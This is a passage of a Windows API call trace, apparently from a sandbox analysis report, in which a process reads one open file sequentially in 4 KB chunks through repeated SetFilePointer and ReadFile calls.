lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x105000 [0081.258] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.259] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x106000 [0081.259] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.259] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x107000 [0081.259] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.261] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x108000 [0081.261] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.261] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x109000 [0081.261] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.262] SetFilePointer (in: 
hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x10a000 [0081.262] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.262] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x10b000 [0081.262] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.263] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x10c000 [0081.263] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.263] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x10d000 [0081.263] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.264] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x10e000 [0081.264] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 
[0081.264] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x10f000 [0081.264] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.265] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x110000 [0081.265] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.266] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x111000 [0081.266] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.266] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x112000 [0081.266] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.267] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x113000 [0081.267] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, 
lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.267] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x114000 [0081.267] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.268] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x115000 [0081.268] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.268] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x116000 [0081.268] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.268] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x117000 [0081.269] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.270] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x118000 [0081.270] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, 
lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.270] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x119000 [0081.270] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.271] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x11a000 [0081.271] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.271] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x11b000 [0081.271] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.272] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x11c000 [0081.272] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.272] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x11d000 [0081.272] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, 
lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.273] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x11e000 [0081.273] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.273] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x11f000 [0081.273] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.274] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x120000 [0081.274] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.274] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x121000 [0081.274] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.276] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x122000 [0081.276] ReadFile (in: hFile=0x4bc, 
lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.276] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x123000 [0081.276] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.277] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x124000 [0081.277] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.277] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x125000 [0081.277] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.278] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x126000 [0081.278] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.278] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x127000 
[0081.278] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.278] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x128000 [0081.279] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.280] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x129000 [0081.280] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.280] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x12a000 [0081.280] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.281] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x12b000 [0081.281] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.281] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x12c000 [0081.281] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.282] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x12d000 [0081.282] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.282] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x12e000 [0081.282] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.282] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x12f000 [0081.282] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.283] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x130000 [0081.283] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.284] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x131000 [0081.284] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.284] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x132000 [0081.284] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.285] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x133000 [0081.285] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.285] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x134000 [0081.285] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.285] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x135000 [0081.286] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.286] SetFilePointer (in: 
hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x136000 [0081.286] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.286] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x137000 [0081.286] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.286] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x138000 [0081.287] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.288] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x139000 [0081.288] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.288] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x13a000 [0081.288] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 
